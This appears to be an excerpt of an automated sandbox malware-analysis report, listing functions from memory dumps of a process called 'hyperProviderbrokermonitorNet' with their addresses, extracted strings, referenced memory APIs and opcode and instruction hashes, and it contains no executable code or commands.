Opcode Fuzzy Hash: e19c671c68f7658cf892a1b43ca67919bfc2602de24cf0814df0b2cbb939b5ca
Instruction Fuzzy Hash: 5D22B461F1895A8BE798EF28C8A56F877D2FF95310F0445BAD14ED3283DE2CAC819741

Function 00007FFD34691C89 Relevance: 2.6, Strings: 2, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 00007FFD34691CA6
Xt4, xrefs: 00007FFD34691CF6

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: M$Xt4
API String ID: 0-1147253894
Opcode ID: f1bdf936ea33eb548141e29302d68a25f6feef6180c3e43b1b7dd6bfdf59f349
Instruction ID: 415bf0ef4e15aaa3083ab41f4a10c57e04a0c41c91fb8635c1a8d167eecda662
Opcode Fuzzy Hash: f1bdf936ea33eb548141e29302d68a25f6feef6180c3e43b1b7dd6bfdf59f349
Instruction Fuzzy Hash: 7711A371A0E7C94FEB169F3448A50E8BFB0EF57210B4901FBD589CB1A3EA2C9845C741

Function 00007FFD34670EC7 Relevance: 1.8, Strings: 1, Instructions: 515
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

p\q4, xrefs: 00007FFD346712F8

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34670000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: p\q4
API String ID: 0-944575574
Opcode ID: bac8be4f5f24b86968d79867947061e42ce5a909687cfdccba821ca2a553f69e
Instruction ID: fe5873baa1adffab0d4b440865b0d543e9900e805553d0f03273743b02c62726
Opcode Fuzzy Hash: bac8be4f5f24b86968d79867947061e42ce5a909687cfdccba821ca2a553f69e
Instruction Fuzzy Hash: FDF1C121F1896A8BE758EF18D8A17F877E2FF95350F04417AD54EC7286DE2CAC829740

Function 00007FFD346710A9 Relevance: 1.7, Strings: 1, Instructions: 443
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

p\q4, xrefs: 00007FFD346712F8

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34670000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: p\q4
API String ID: 0-944575574
Opcode ID: 554cba3aedc997ea25086d5a899dc272a3bba33c3a8d02c2970aeb481ffaa92c
Instruction ID: 7a119de8799a663384e372069a91d83718dbc8cf1a0579770d1c4ecf373e4094
Opcode Fuzzy Hash: 554cba3aedc997ea25086d5a899dc272a3bba33c3a8d02c2970aeb481ffaa92c
Instruction Fuzzy Hash: 2CE1B221F1892A8BE758EF18D8A16F877E2FF95350F10457AD54EC7287DE2CAC429740

Function 00007FFD3466B16A Relevance: 1.6, APIs: 1, Instructions: 144
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FFD3466B24D

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34664000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34664000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34664000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 98c6bbebde9047814a4823bcd42fcf522d01e5f9695f14b624617b42fb1a9345
Instruction ID: 1751bf384f6c1a9da53004a4f99b24fa7c02cd645423b7c903423d27eae99408
Opcode Fuzzy Hash: 98c6bbebde9047814a4823bcd42fcf522d01e5f9695f14b624617b42fb1a9345
Instruction Fuzzy Hash: 5A41383190C7988FD71A9BA898566F97FE0EF57721F0442AFD089D3192CE786806C792

Function 00007FFD34693415 Relevance: 1.5, Strings: 1, Instructions: 297
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@aT4, xrefs: 00007FFD34693498

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: @aT4
API String ID: 0-203836115
Opcode ID: 076604787b5001cc094b594852f920bdea344de0f4c4d1039f3f85e5280d0d12
Instruction ID: db3face336fa292e765ae7fa126234a0d0ffdf9626bbac8b7cdfdf4896ae52c8
Opcode Fuzzy Hash: 076604787b5001cc094b594852f920bdea344de0f4c4d1039f3f85e5280d0d12
Instruction Fuzzy Hash: C391F321B1CA5A0FEB98EE5884B62F973C2EFD9314F04447AD54EC7287DD6CAC859381

Function 00007FFD3466C141 Relevance: 1.4, APIs: 1, Instructions: 127
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00007FFD3466C1F4

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34664000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34664000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34664000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 37dc42ddd506c470cab3de6f5072b436889d549a574b79fa9127a3601b121a2f
Instruction ID: f0cdfa262f58d43fbcfe895f2bf90bd1ecce32a32ce40f764a54a59a1c307309
Opcode Fuzzy Hash: 37dc42ddd506c470cab3de6f5072b436889d549a574b79fa9127a3601b121a2f
Instruction Fuzzy Hash: 01310B31A0CB8C4FDB1DDFA898556F9BBE0EF56321F00427FD049D3152DA64A8158781

Function 00007FFD34697D69 Relevance: 1.3, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

I, xrefs: 00007FFD34697D86

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: cafd929276356b08e49b63e19124065f4baefe2a4639846ef46950c401edfccd
Instruction ID: b186917afc33c4cb22f3167ac8ca5bbf1b7f6e74a2c49d634775e664322c8697
Opcode Fuzzy Hash: cafd929276356b08e49b63e19124065f4baefe2a4639846ef46950c401edfccd
Instruction Fuzzy Hash: A2210821A0D6D58FD32A9A3498A5AB57FA0DF57310F0900FFD58ACB1D3E95C6C0AC352

Function 00007FFD34673B59 Relevance: 1.3, Strings: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

I, xrefs: 00007FFD34673B76

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34670000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: fdce2d6c734dca1150e438f7f2d48fe85d51389579dd000af8095cb56515b5cb
Instruction ID: 803f2f5521119f04edb62691d6950cbc3bed281273a1b2312dfa04e735cf5fcf
Opcode Fuzzy Hash: fdce2d6c734dca1150e438f7f2d48fe85d51389579dd000af8095cb56515b5cb
Instruction Fuzzy Hash: 8421B070A0D29A8FEB059F748CA55E97FB0AFA3310F0585BAC155CB1A2EA3CA844D741

Function 00007FFD34674529 Relevance: 1.3, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

I, xrefs: 00007FFD34674546

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34670000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 70f37058706da53d9972ec56535777d366a95f55f5adb9610b92a794a068f9be
Instruction ID: f3d79c197a0e1d62405f6fc4ca9b593f2ff012635702320d3ba97e33b3836349
Opcode Fuzzy Hash: 70f37058706da53d9972ec56535777d366a95f55f5adb9610b92a794a068f9be
Instruction Fuzzy Hash: 4711E621A0D6D44FEB169E3488A96A43FA1AF57310F4A41FBC189CB1E3D91D9C45C311

Function 00007FFD3469A4F9 Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD3469A516

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 79252b5be7ef1a9c5291fdf52deff1be888350e85d532e85d2b59cd621f1910b
Instruction ID: b63125c06859f1a9070e08b68161d23e238bb8dca0ada4d11724e4488db098ca
Opcode Fuzzy Hash: 79252b5be7ef1a9c5291fdf52deff1be888350e85d532e85d2b59cd621f1910b
Instruction Fuzzy Hash: 0C11E561A0E7C84FD756AB344C694A9BFB0EF57200B4A41EBD449CB1A3E92CAC49C701

Function 00007FFD3469A429 Relevance: 1.3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD3469A446

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 7d8dd2006c3f4b7c35b76ca6340f7e076b6ff1c05620edb65307ebe67a603f26
Instruction ID: 0a4289771383d2ff9560dd47824a09c07fa6c7f40d0a7cb43e0e62208d50c0e1
Opcode Fuzzy Hash: 7d8dd2006c3f4b7c35b76ca6340f7e076b6ff1c05620edb65307ebe67a603f26
Instruction Fuzzy Hash: AD018051A0E7D10FD76A6A3448790A47FA0DF57610B0A01EBC189CF5E3E95D9C88C742

Function 00007FFD346909A9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD346909C6

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 9b3ff80c72b3e984b43dc2b58049d48dc4c1b3f8b69a193df78c18f08d225df7
Instruction ID: 978a2fd5b2caf6c7b5025e35c267fe7a8785e0bd00cd34bed780ddbd1647b520
Opcode Fuzzy Hash: 9b3ff80c72b3e984b43dc2b58049d48dc4c1b3f8b69a193df78c18f08d225df7
Instruction Fuzzy Hash: 3BE06D71A4E7C04FCB16AA348868454BFB0EF6721174A52EEC146CF1A3EA2D9889CB11

Function 00007FFD34691D19 Relevance: 1.3, Strings: 1, Instructions: 24COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD34691D36

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: fc3c4fddb17b1c5f759d886d9f497f25c76ee6bf298195cf18e9065bfa7d69c8
Instruction ID: 95f63a4ab7828515c80c7da358676d0a1c85eb44bc9dee3d539dec27fd973007
Opcode Fuzzy Hash: fc3c4fddb17b1c5f759d886d9f497f25c76ee6bf298195cf18e9065bfa7d69c8
Instruction Fuzzy Hash: F1E01A6154F3D44FDB46EF3488769943FA1AE6721078E44EEC185CF2B3E62D9849C701

Function 00007FFD3469AA39 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD3469AA56

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 21ef74a3b979bfb9ddb283e1f15735d63c90a0fc6ad76e729c1df5e63f121f24
Instruction ID: e7437273dc0183b01ab8f156d38a0b4a7c6ed2e47d7d2715b14cfa6959c32040
Opcode Fuzzy Hash: 21ef74a3b979bfb9ddb283e1f15735d63c90a0fc6ad76e729c1df5e63f121f24
Instruction Fuzzy Hash: 20E01A7154F7D04FCB46EB3488A98497FA0EE6721078B41EEC149CF1B3E62E8849C701

Function 00007FFD3469AB7D Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2357c7a5d4f7df5421f514d4f9bb0646f1e952f386fe8e3070cceb0ada292aa
Instruction ID: 146aa87f984baf0c02521636fa9199ae469739f5f80c49361379f11ca3557483
Opcode Fuzzy Hash: a2357c7a5d4f7df5421f514d4f9bb0646f1e952f386fe8e3070cceb0ada292aa
Instruction Fuzzy Hash: FA512661B0D9AA0FE7A4AF289CB65F837D1FF9A300B0800BBD54DC7293DD5C6845A341

Function 00007FFD34692351 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa98cc164245a705e96a31ffd28dd43cc6d5a397a03e6b63237a26c138f65c0e
Instruction ID: 41b71367516420b2a4679b356d3473ee1459fca67620973cab36825bf25ebe8d
Opcode Fuzzy Hash: aa98cc164245a705e96a31ffd28dd43cc6d5a397a03e6b63237a26c138f65c0e
Instruction Fuzzy Hash: FD312871A08A694FE798DE08C8A47F977E1FB95310F04057AD40AD72D2CAB86C85C781

Function 00007FFD34660C25 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27e1e0de7a37e13f6bba5ab5b71df7c83421f64313bdbc0d4be74c1e349e3611
Instruction ID: 43ee0a2b45f2ed7afc2e479beaf0adc48350e5a1a6103cbb0810dff5d216f627
Opcode Fuzzy Hash: 27e1e0de7a37e13f6bba5ab5b71df7c83421f64313bdbc0d4be74c1e349e3611
Instruction Fuzzy Hash: 41210471B0DA998FE712DF68C8A92ED7FA0EF42324F1541BAC244CB1C2DA3C25459781

Function 00007FFD346919F4 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57d576bb21a36c7cb59dce13da972ece169891de64f571afc49af56411050f18
Instruction ID: 2e58629c09bfc56527f4a306c9aa9acd3580d1ea55a8f1121a1c984264768f09
Opcode Fuzzy Hash: 57d576bb21a36c7cb59dce13da972ece169891de64f571afc49af56411050f18
Instruction Fuzzy Hash: 91218132B1C6614BF71C9A1C94693F936D1FB99719F14027DF48ED32C2DEAC9C428686

Function 00007FFD3469B6FA Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f83cbe8378a3d733648f099de35d5b3f5efb93124447eaad095e03279696906
Instruction ID: f38f45b518cc33817e2ad3ac1b329ddb5a25f71de293eacfc89dfd30420c726a
Opcode Fuzzy Hash: 7f83cbe8378a3d733648f099de35d5b3f5efb93124447eaad095e03279696906
Instruction Fuzzy Hash: 83110627A09A524BD319FB5CE4FA4F537D0FF9662970901BBC188CE0A3EC19A8498245

Function 00007FFD3469D8C9 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b11e2cf86af1eb43aef13be2b058c14980577b8c8436bbe3f5a84bca7d5790f2
Instruction ID: ee240ab2222d51f98c018b16f45e8337c1b49a0fa388223dbaff957df6d1d2c4
Opcode Fuzzy Hash: b11e2cf86af1eb43aef13be2b058c14980577b8c8436bbe3f5a84bca7d5790f2
Instruction Fuzzy Hash: 9201D432A1A68C4FDB45AF3488A88E8BFA4EF46214B4501FBD049CB1A3DA2D9948C701

Function 00007FFD34673E4B Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34670000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c32fa017ac005cabd6533971129863c106b98ddb59ca1c4cdb6386657fa6be5d
Instruction ID: ccc6c9a2353087e9fb26335c8c7275c46343eb267ed38428fdca89ae8b58a8b3
Opcode Fuzzy Hash: c32fa017ac005cabd6533971129863c106b98ddb59ca1c4cdb6386657fa6be5d
Instruction Fuzzy Hash: 31018B71F0851A8FEB24EF94C8A86FD7BB1FF45310F14413AD009E7292CE7828419B80

Function 00007FFD34698FC1 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7ac56eb159517e4f069afe3a6c7a7206defe7576f6e9092ff7f9c1073346361
Instruction ID: 470797782cdb1779a90479cfbf47ea68e1ed0df901f4e6bca6b08e66a51fbd1d
Opcode Fuzzy Hash: e7ac56eb159517e4f069afe3a6c7a7206defe7576f6e9092ff7f9c1073346361
Instruction Fuzzy Hash: E6F0F652D0E6DA1EE7225B784C760E8BFA4EF13210F4822F7D18CC6493DD5D28569342

Function 00007FFD3469D764 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c01e055b02c0fee5721af5473fbb10d2cffcc598dd2aa226a69a9b20ca82a6b6
Instruction ID: cb9b4334a62f12226da25ae1e0f3ba76cebec3913ab031f1d5a009c596633991
Opcode Fuzzy Hash: c01e055b02c0fee5721af5473fbb10d2cffcc598dd2aa226a69a9b20ca82a6b6
Instruction Fuzzy Hash: EF01A231F0412A8FEB94EE69D4A97FE73E0EB95311F040436D20DD7286DA6CA9809780

Function 00007FFD34660C48 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3bc47833d86b07e1c1b59f4fcae6f80cd6f8f890e5ad5ed4a6e5d9dee05c139
Instruction ID: 90ea2e905f3d98e19dc12a337f4ca6bcf742d8d74d7c7b6e6b77f4e420b0b662
Opcode Fuzzy Hash: d3bc47833d86b07e1c1b59f4fcae6f80cd6f8f890e5ad5ed4a6e5d9dee05c139
Instruction Fuzzy Hash: 07019E71A0D7888FE702DF64C8941D9BFB0AF43324F1541EAC180DB192D6385648D781

Function 00007FFD346978B2 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4547a04120bbe8d0aa62d57a2d58b1650651410b333aec47b75c899bdd58d40
Instruction ID: 0ee739689b7959d50d4e6e64d5d50b3f5b6953f33272beb17ef1a46fe96d3e25
Opcode Fuzzy Hash: d4547a04120bbe8d0aa62d57a2d58b1650651410b333aec47b75c899bdd58d40
Instruction Fuzzy Hash: F8F0EC32A464488FDB45AF28D4988F8BB64EF17311B0441FAD10DC7162DE7A5945D700

Function 00007FFD3469A9A9 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d140e5c3707acddc8f81784745bececa7c3138d3388a30941b25bf415c9e0f8
Instruction ID: ddd711e5d3f02d3fd39ba227ab3ce92745a9cf654431faa806fe555c683b661a
Opcode Fuzzy Hash: 6d140e5c3707acddc8f81784745bececa7c3138d3388a30941b25bf415c9e0f8
Instruction Fuzzy Hash: A7F0EC31B19BC40FC759563D48A50617FF1EB5710134A12EFC096C7693ED58FC468745

Function 00007FFD34662AFB Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9003782cf2f5b53d39ba6cfac4a0c437b0edc4107636ce5717bf2b4f1b9fda9
Instruction ID: 3315c0212a7ac8353e97017ac409ac118b0b27935d9e4e7041e1c84c6b747cc8
Opcode Fuzzy Hash: c9003782cf2f5b53d39ba6cfac4a0c437b0edc4107636ce5717bf2b4f1b9fda9
Instruction Fuzzy Hash: 44F0EC30648A088FCF58EF04C494DAA77F1FBA9311F144559D44AD7260DB79A985CF41

Function 00007FFD34692F49 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad1a8b8fa81af7bd5c8b4bf760a1116ae75c299a0388b777404f2fd4f3133132
Instruction ID: eda44fc76fbc6f701fec6a215690349b916c746f3960524e8ec8b4de0a879d35
Opcode Fuzzy Hash: ad1a8b8fa81af7bd5c8b4bf760a1116ae75c299a0388b777404f2fd4f3133132
Instruction Fuzzy Hash: F5E01221609B884FC70E963948695507FB1EB6711178952DBC445CB2A3D919DC89C751

Function 00007FFD3469D949 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8ae607cddbe8ed08f534ad6b3e29562c5bbbca7b48e5e1448c58c4a593e7adf
Instruction ID: 173c41b6e3d0b4dc10c99784e121726cb37e62059dc1e74e7317ee8656832aad
Opcode Fuzzy Hash: c8ae607cddbe8ed08f534ad6b3e29562c5bbbca7b48e5e1448c58c4a593e7adf
Instruction Fuzzy Hash: B9E01A2294F7C04FCB4B9B3488A99907F70EF1721178A40EAC085CF6A3EA2DAC59C751

Function 00007FFD34675248 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34670000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b223518469489f8ed06297361b8ea904d9a81351c4ec4d90a65e7841d014a2c
Instruction ID: 8371c0acc520cd1fe6e4615c1e2dcd0afeb51519f901e8b50617478ecf058702
Opcode Fuzzy Hash: 4b223518469489f8ed06297361b8ea904d9a81351c4ec4d90a65e7841d014a2c
Instruction Fuzzy Hash: 4AD05E30B609494B8B8CA62D8468470B3D1E7AA2167D462B8940BC2281ED29ECC68B80

Function 00007FFD3469A510 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FFD3469A440 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FFD346978D9 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61239d679b9dcdb219fadb82e566505ef307ad150818f14d6b08d49160f4c7bd
Instruction ID: 274fdff2ddef36a8e85e1b5799a93dba970163568acca17c17b81f0deeb6e875
Opcode Fuzzy Hash: 61239d679b9dcdb219fadb82e566505ef307ad150818f14d6b08d49160f4c7bd
Instruction Fuzzy Hash: 63E04F2194E7C08FC74BAB3488B88507F70DE5721178A41EEC145CF5B3D62D8849C702

